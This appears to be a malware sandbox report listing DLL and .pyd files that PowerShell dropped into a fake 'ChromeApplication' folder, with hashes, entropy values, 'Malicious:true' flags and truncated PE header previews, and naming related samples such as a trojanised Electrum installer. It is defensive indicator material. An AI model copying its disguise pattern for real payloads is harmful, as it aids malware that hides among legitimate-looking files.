                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: x.bat, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Patched.24562.10289.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Patched.29806.7109.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: electrum-4.5.3-setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: electrum-4.5.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j.:...i...i...i.svi...i.~.h...i.d.i...i.~.h...i.~.h...i.~.h...i.~.h...i.s.h...i...i...i.~.h...i.~.h...i.~.i...i.~.h...iRich...i........PE..L...Y.,d...........!.........D.............................................. ......!.....@.............................H................................/.......... ...T...........................x...@...............8............................text............................... ..`.rdata...-..........................@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ctypes.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):108312
                                                                                                                                                                                                  Entropy (8bit):6.644234290397436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:qS6mSAe9tVW/dhyGfnH/Jt5Phld/7VILLPf17Mxk:qS6mzInWlhyiH/Jt1d/7wJ
                                                                                                                                                                                                  MD5:FF0992DFB0D4D90BDCEAAD68246C5C22
                                                                                                                                                                                                  SHA1:3508B7D730DDE3DB94AE413625451AE8CAA0BD7D
                                                                                                                                                                                                  SHA-256:F879F86BF65CE05EE3467DF65C55B9837F9DFFB0F024C350C9A9869A08609759
                                                                                                                                                                                                  SHA-512:8BEBC01958D71B327CBC39ED04BC53F6484CAA0232A1FD71E6691BDAA89FCBC766BC888D45870DC24D1190C48A0AE0A58C447EC936E34DB23059EE6F35A138BB
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.....................H..............................................Y........&................$..........Rich...........................PE..L...W.,d...........!................................................................)]....@.........................P4.......4.......p...............x.../.........../..T............................/..@............................................text...!........................... ..`.rdata..TK.......L..................@..@.data...l....P.......:..............@....rsrc........p.......V..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_decimal.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):195864
                                                                                                                                                                                                  Entropy (8bit):6.894532348319941
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:HJwcAu1LgDNsFyrbz5arkp1Lq00rBCXN4hmuqaxgU3pJMWlXgWcW+33SgRILOqXv:HNAg8rRaULECXN4Quqax33XMW5gJW+34
                                                                                                                                                                                                  MD5:FBE8BB3048DF17FF9DDB0972825FDA71
                                                                                                                                                                                                  SHA1:E3AD65446B60554CB9F7C45700BE2EAD1453772F
                                                                                                                                                                                                  SHA-256:283AA604D532B6239AA8D8794C8D8A4F3A11C93DFBCEF846315CFD74F5E07E2F
                                                                                                                                                                                                  SHA-512:48C66F10F9E79359DF63FD381C21B4559438DAE7AD84C625EFE1C7AB802F31BB8D326650F654C8EA504791595D801679A6F156F7ED90DA98AEBC04D2120C90A6
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m<.c)].0)].0)].0 %"0'].0{(.1+].0{(.1%].0{(.1#].0{(.1-].0.(.1*].0b%.1+].0)].0.].0.(.1&].0.(.1(].0.(N0(].0.(.1(].0Rich)].0................PE..L...E.,d...........!................(........ ......................................R.....@.............................P...`............................/......t.......T...............................@............ ..d............................text............................... ..`.rdata....... ......................@..@.data...x...........................@....rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_elementtree.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):114968
                                                                                                                                                                                                  Entropy (8bit):6.774198419515606
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:Z+6/1DqY6SFc720NRIF2Upji0101tgJIL6fijC8u8xF:Tw9uWy01tgW+g
                                                                                                                                                                                                  MD5:9CBEE02CC8FB2DA7C05B9D6EB5FC38A2
                                                                                                                                                                                                  SHA1:1D0F75F30BDF542E6A275DCA0192C70AE3B2F455
                                                                                                                                                                                                  SHA-256:AFB9950D0B16254025F3C2DE68C877381D3DA57FEFDB02504C21EE8D4C2E84E5
                                                                                                                                                                                                  SHA-512:99841EA990FE5874F3B4975318AC81D144D22CE6A6C245A001B67F33BE3A6D41901B18387F9A1564CAD3544F077812D0AE78D8880C66E79FBFDB1DD50117D2A0
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..7...7...7.......7..6...7..2...7..3...7..4...7.\.6...7..6...7...6.:.7.\.?...7.\.7...7.\....7.\.5...7.Rich..7.........................PE..L...A.,d...........!.........t.......!.......0............................................@.........................Pf..X....f..x......................../...........a..T............................b..@............0..P............................text...l........................... ..`.rdata..ZE...0...F... ..............@..@.data................f..............@....rsrc................p..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_hashlib.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49432
                                                                                                                                                                                                  Entropy (8bit):6.749500211425154
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:H+OYENKnr4deUNXT1Ee20RILOIS5YiSyvWPxWEa1E:HbYENsr4MWT1Ee20RILOIQ7SyOPxl
                                                                                                                                                                                                  MD5:2AC2DEE9FDB32BE30FEFD4FDB5D280B3
                                                                                                                                                                                                  SHA1:5E803C5D649521CAB34BFC7EF6DC44954915220D
                                                                                                                                                                                                  SHA-256:F10C90062EAA68F41B1A6B34F3796E3AB8E0D765E595236E893CFF9FAD30116A
                                                                                                                                                                                                  SHA-512:86A7DFE6F15FCE67ACCBC84262C73D25F2E440B7529143235B9B32F15F7804F99206E24C5ED8E5219BB5895BF6E397304BA153E064FF97EED23F5E92469E901E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I.&...H...H...H.......H._.I...H._.M...H._.L...H._.K...H...I...H.F.I...H...I...H...I.H...@...H...H...H......H...J...H.Rich..H.........PE..L...q.,d...........!.....>...T.......C.......P.......................................+....@..........................w..P....w.........................../..........(s..T............................s..@............P...............................text...t=.......>.................. ..`.rdata..j4...P...6...B..............@..@.data...h............x..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_lzma.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):148248
                                                                                                                                                                                                  Entropy (8bit):7.03034519275223
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:VcSEmJbTMWUCFHRQWtwjEYZLlFrFvIB+hBJQ8T374Tu2d//zHf39mNoBJNWQ5ILt:GwUC9RQWtwjEGgYXT3CTvYOVWQI
                                                                                                                                                                                                  MD5:6174470C775AD7529891E1BA3C54F87B
                                                                                                                                                                                                  SHA1:A1536BDECFD42F99BD1CC561EC727D81F613D205
                                                                                                                                                                                                  SHA-256:E1E346F8B9FA43EC5519166D92625168EBB642A70F52611545117631C74181BD
                                                                                                                                                                                                  SHA-512:0595EA1C8D2784D1C8272E29D8E9C1C074FFA1CA14116AE7E65C52DA1D1E87A0AE1FD9D3EF285F887A8847008DA1EBE3E1F6ACF1294AFDC9E2F31216F7AB7CB4
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*.P.D.P.D.P.D.Y...T.D...E.R.D...A.[.D...@.Z.D...G.S.D...E.S.D...E.R.D.P.E.1.D...L.j.D...D.Q.D.....Q.D...F.Q.D.RichP.D.........PE..L.....,d...........!.....f..........<k.......................................@.......C....@.............................L.......x.... .................../...0..t.......T...........................H...@...............x............................text...[e.......f.................. ..`.rdata..b............j..............@..@.data...H...........................@....rsrc........ ......................@..@.reloc..t....0......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_msi.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37656
                                                                                                                                                                                                  Entropy (8bit):6.790398784644929
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:uW9a35lnOP/xoUAIpd+o7uMnm9YVp5Dsa5ILCGaY35YiSyvJPxWEas6:T9a35lOPJmmVp5Dh5ILCGz7SyBPxA
                                                                                                                                                                                                  MD5:87A21CFE0CB3953D5D1442042A72C602
                                                                                                                                                                                                  SHA1:2E33DCF83DAA1642CBE38BBD1CABC15072DCDC1C
                                                                                                                                                                                                  SHA-256:8DF955D1CA6519173E34785FB9F38D1D52F4EDBA4F0E0742749F13AEF19A8F34
                                                                                                                                                                                                  SHA-512:01222931EA798F6783EE6F665FE2E3B911BA7818651DD89E7EB0F1EC8EBCB4912361593E6FA24427DE6A74C5F53AE9A99F291A8F85A985DFCD10546FAB6B3B03
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j.{...(...(...(.s[(...(.~.)...(.~.)...(.~.)...(.~.)...(.~.)...(.s.)...(...(...(.~.)...(.~.)...(.~7(...(.~.)...(Rich...(................PE..L...F.,d...........!.....(...<.......-.......@.......................................<....@.........................PW..H....W.......................d.../...........R..T...........................8S..@............@...............................text...j'.......(.................. ..`.rdata...!...@..."...,..............@..@.data........p.......N..............@....rsrc................T..............@..@.reloc...............^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_multiprocessing.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29976
                                                                                                                                                                                                  Entropy (8bit):6.798507676792536
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:aQJATEdgw8HYcj4HjzjuRTBax6i+5/ZMILWBLCHQIYiSy1pCQHcPxh8E9VF0NyUC:9kHYDs88HFZMILWtY5YiSyv8PxWEaC
                                                                                                                                                                                                  MD5:7AB685D3F467C7029DEE1A943BB19065
                                                                                                                                                                                                  SHA1:BCADE206E6863874EAF72A1CAA748FBDEE916970
                                                                                                                                                                                                  SHA-256:91889BBF6DFADFC026276141A4260D7F2C19090FDE9EE04490B9211DD3933EBA
                                                                                                                                                                                                  SHA-512:D8E8CABA0D030FA0433D71D376608ACA2DA003D76C67FE9AB8C7B7E4A6AA7E0C21454E1D45CD052BB67B681B57094BDFA9CD634C1A1AE22C104568D20D13B02A
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ Nb.A 1.A 1.A 1.9.1.A 1.4!0.A 1.4%0.A 1.4$0.A 1.4#0.A 1i4!0.A 1.A!1.A 1.9!0.A 1i4(0.A 1i4 0.A 1i4.1.A 1i4"0.A 1Rich.A 1........PE..L...D.,d...........!.........,...............0......................................./....@.........................P<..`....<..x....`...............F.../...p.......7..T............................8..@............0..H............................text...t........................... ..`.rdata.......0......................@..@.data...`....P.......4..............@....rsrc........`.......8..............@..@.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_overlapped.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42264
                                                                                                                                                                                                  Entropy (8bit):6.794037552069512
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Hv9eDBCwgCnLEggqKboqjzezQPxNILXtV05YiSyvdPxWEaoC:FwgULj8NvezQPxNILXtVe7SylPxRC
                                                                                                                                                                                                  MD5:0A4AAABED72E8E08143EB129E5E24407
                                                                                                                                                                                                  SHA1:A85094E29FE1DE755DFB2BB2650378CA7BD1F5F2
                                                                                                                                                                                                  SHA-256:2233C561A18D92ADC2F4C56D6C55ADFB4A01049E801BDD3BB2A03CEE125F6E43
                                                                                                                                                                                                  SHA-512:79942D76D23376C71028EED8658E2C938DFE64D54D56FC60C0CA8F2FCA9515D7A5A24A5ABFDCB51DFF944ED2F7BEB17B6D5BA50D45A62DE9A7DB4FDCF6A04F62
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P..f...f...f......f...g...f...c...f...b...f...e...f...g...f...g...f...g...f...b...f...n...f...f...f.......f...d...f.Rich..f.................PE..L...H.,d...........!.....8...>......]<.......P......................................{.....@..........................h..X...(i.......................v.../......$...8d..T............................d..@............P...............................text...$6.......8.................. ..`.rdata...#...P...$...<..............@..@.data................`..............@....rsrc................d..............@..@.reloc..$............n..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_queue.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28440
                                                                                                                                                                                                  Entropy (8bit):6.828727954203399
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:gtbUDut6rf1vYvVILQUG5YiSyvhPxWEa4:uUa8f1vYvVILQU87SyJPxp
                                                                                                                                                                                                  MD5:2E6FE907E37F3F9154DB187C1B7F8232
                                                                                                                                                                                                  SHA1:77F25B5D95097DFDA0F9FD58632F8711091547CD
                                                                                                                                                                                                  SHA-256:763D333C80F4C11861C9210C4BD53FEDA24B5598AC9270391B2EC250BD52B636
                                                                                                                                                                                                  SHA-512:D87683A681D576CB334BDF2CE385E6BDB115D18232E160F17535A6BA432342604ADE6404F085F64ECA63C639860968603D4D8DB11A11520A1BC44B2A57FE00AF
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p..p..p....p...q..p...u..p...t..p...s..p.m.q..p..q..p..q...p.m.x..p.m.p..p.m....p.m.r..p.Rich..p.................PE..L...H.,d...........!.........*...............0............................................@..........................<..L....=..d....`...............@.../...p..\...`8..T............................8..@............0...............................text............................... ..`.rdata.......0......................@..@.data...@....P.......0..............@....rsrc........`.......2..............@..@.reloc..\....p.......<..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_socket.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):69912
                                                                                                                                                                                                  Entropy (8bit):6.7529275237414
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:XAqVY6E4oksA1MT9f8+CeJ+8WyKTVVILLwt7SyJPxl:XAqVY3FA1MT9f8DeJ+8W9TVVILLwtvxl
                                                                                                                                                                                                  MD5:A092B2DE9E1128F73E26D142A5B2D68B
                                                                                                                                                                                                  SHA1:0C5E38B11389ACC870056200710F4152FBB03429
                                                                                                                                                                                                  SHA-256:389D2B94A3562879F9E0A17CACE1574EE308AC39A5D9F5659F885284C9B2D19E
                                                                                                                                                                                                  SHA-512:60D45D3BEF3C8729CA879816A321B8508AE304A84499E715CB2AD7352273A6482B82C960092311E3EF40F1326D6533CE25B61953A197F7D3FBCE2C0CF511D5E2
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...k...f...0.`...0.n...0.h...0.c.....`...b......)...e.....c.....c.....j.c.....c...Richb...................PE..L...n.,d...........!.....f...|......tk....................................................@.........................P...P................................/..............T........................... ...@............................................text...:e.......f.................. ..`.rdata...Z.......\...j..............@..@.data...(...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_sqlite3.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):72984
                                                                                                                                                                                                  Entropy (8bit):6.755617527508713
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:a85mWPlKtIGSqpnoOUNGHxvttnGyOuPrF2dRILOQxyO7Syo/PxjP:XmdiHqpjmGx1tnGEzF2dRILOQxheHxD
                                                                                                                                                                                                  MD5:389A85E60B7DA2F29AAA738A7BF2B542
                                                                                                                                                                                                  SHA1:4C6F51FD4C25F22474667AB8078AD974A9628C5D
                                                                                                                                                                                                  SHA-256:8A703DA286CDBC263FE28D0888C03BB899E73B4B7729C44A953CC6139F33E3BE
                                                                                                                                                                                                  SHA-512:898506A70DA25E8D181DF7E7790430ABEFCB0C9EECCB0595A1983CE09B6155DD0C72935470FBB9EF0BFA0BFFC953555693FF2FFA2461C10B84578691CD0C7B50
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7@..s!.]s!.]s!.]zY.]u!.]!T.\q!.].Ny]r!.]!T.\.!.]!T.\y!.]!T.\r!.].T.\v!.]8Y.\q!.]s!.].!.].T.\z!.].T.\r!.].T{]r!.].T.\r!.]Richs!.]........PE..L.....,d...........!.........n.......................................................I....@.........................P...P................................/......8.......T...............................@............................................text....~.......................... ..`.rdata...E.......F..................@..@.data...L...........................@....rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ssl.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):141592
                                                                                                                                                                                                  Entropy (8bit):6.519132347042123
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:Q1ixmpACRnjX8bpl/u3O90wxY77N5ILC792oywBxv:4ixmpPsbppu3zwxWN9b
                                                                                                                                                                                                  MD5:1222DAA5C49F53A36D2843CA9BFE513A
                                                                                                                                                                                                  SHA1:7A43E326B261E75A05CDFA979B80E95B69080173
                                                                                                                                                                                                  SHA-256:69C76B8FE5C873D1A0DFF493C3A3B88090B61EE648AD7681BC0581964465589E
                                                                                                                                                                                                  SHA-512:B5BF384D14C3C8221A42288F97D910491730C84BE0A783F5BD17FC2E3DF7F2BB63529571C97CB08064066AA90F07FA00C837944E43DB62E071089A720A8BB551
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_...>...>...>...F-..>...K...>...K...>...K...>...K...>..=K...>..8B...>...>..r?...F...>..=K...>..=K...>..=KA..>..=K...>..Rich.>..........................PE..L...~.,d...........!.........L......t........................................ .......P....@..........................q..d...4r.........................../..........Pm..T............................m..@...............,............................text............................... ..`.rdata..............................@..@.data....J.......H..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_uuid.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22808
                                                                                                                                                                                                  Entropy (8bit):6.937211239543495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vqIesePwjnE8Gtr5ILZwkeHQIYiSy1pCQiI/NPxh8E9VF0Nyn54qSc:CIeZkgr5ILZwkU5YiSyvT/NPxWElQc
                                                                                                                                                                                                  MD5:59F19A807B3E13D8E707C942A38BF84E
                                                                                                                                                                                                  SHA1:469DEC6DA89737795C72FF51F69B44462E55099A
                                                                                                                                                                                                  SHA-256:7ED17311B391FFFF58F073ECF71829F73629033458A54A435DC62014281A733C
                                                                                                                                                                                                  SHA-512:3C10A7B3AF03E1AE95C577FB4FEE108D0ACFF876DFE0FD1079F74DE30881B5F3659AAA1F52A857CEC9C7430248094E896261C297A25C62D4951252A3A74EB48A
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[..:...:...:...B'..:...O...:...O...:...O...:...O...:...O...:...B...:...:...:...O...:...O...:...OK..:...O...:..Rich.:..................PE..L...M.,d...........!......................... ...............................`......5.....@..........................%..L....%..x....@...............*.../...P..l.... ..T...........................H!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..l....P.......(..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\_zoneinfo.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39192
                                                                                                                                                                                                  Entropy (8bit):6.848342556185962
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:64mK0kiN79J9M3MMc0U2cLbEMRIL9XbR5YiSyvQydPxWEaQK:6rN9JAU9bEMRIL9X77Sy4WPxdK
                                                                                                                                                                                                  MD5:3737DA6429A20AF06F34F307C5611E1C
                                                                                                                                                                                                  SHA1:5FF4FBF0C655DFF7EADBA5FBEBDC2C889003F869
                                                                                                                                                                                                  SHA-256:FCD5C9C9131113354ACEB5A9ED26C75EA7DDC9B44DDC4286A1EFFFC1E3EE4D55
                                                                                                                                                                                                  SHA-512:BF6C94331E8A84302DA2F0AB765B2F44E3EA69A1472689498F1A6D67451B58A944505B63C607F9004A1B91FB3221CE2FB2FD6F1FA088128057596D762A189ACB
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./..tA..tA..tA......tA..@..tA..D..tA..E..tA..B..tA.=.@..tA..@..tA..t@.tA.=.I..tA.=.A..tA.=....tA.=.C..tA.Rich.tA.........................PE..L...:.,d...........!.....:...........?.......P............................................@..........................]..T....]..x....................j.../......x....X..T...........................PY..@............P..L............................text....9.......:.................. ..`.rdata..f....P.......>..............@..@.data........p.......V..............@....rsrc................Z..............@..@.reloc..x............d..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\libcrypto-1_1.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2276120
                                                                                                                                                                                                  Entropy (8bit):6.111762453951637
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:3L7Iy5xntVyJSFtv3A8+QK1CPwDv3uFfJKShr:3L7Iy59nFdA8m1CPwDv3uFfJK+
                                                                                                                                                                                                  MD5:4633D62F19C0B25318B1C612995F5C21
                                                                                                                                                                                                  SHA1:50601F9E2B07D616FDE8EE387CE8CDCB0CA451DF
                                                                                                                                                                                                  SHA-256:47376D247AE6033BC30FEE4E52043D3762C1C0C177E3EC27CA46EFF4B95C69B0
                                                                                                                                                                                                  SHA-512:D6A18E43B1A20242F80265054ED8D33598439FFA5DF4920931FF43EC91F1AC2D8A3931913FD5569F48C9B1B9EA845D9E017EA23571A1AC1B352502A3E823ECA9
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..uk..uk..uk...k..uk..tj..uk..pj..uk..qj..uk..vj..uk..tko.uk..tj..uk2.qjs.uk2.uj..uk2..k..uk2.wj..ukRich..uk........PE..L......c...........!...".(...........g.......@................................#.....8."...@.........................`....h....!.T.....".|............."../....".4.......8...............................@.............!..............................text....&.......(.................. ..`.rdata..v*...@...,...,..............@..@.data...TY...p!......X!.............@....idata........!......n!.............@..@.00cfg........!.......!.............@..@.rsrc...|.....".......!.............@..@.reloc........".......!.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\DLLs\libffi-7.dll

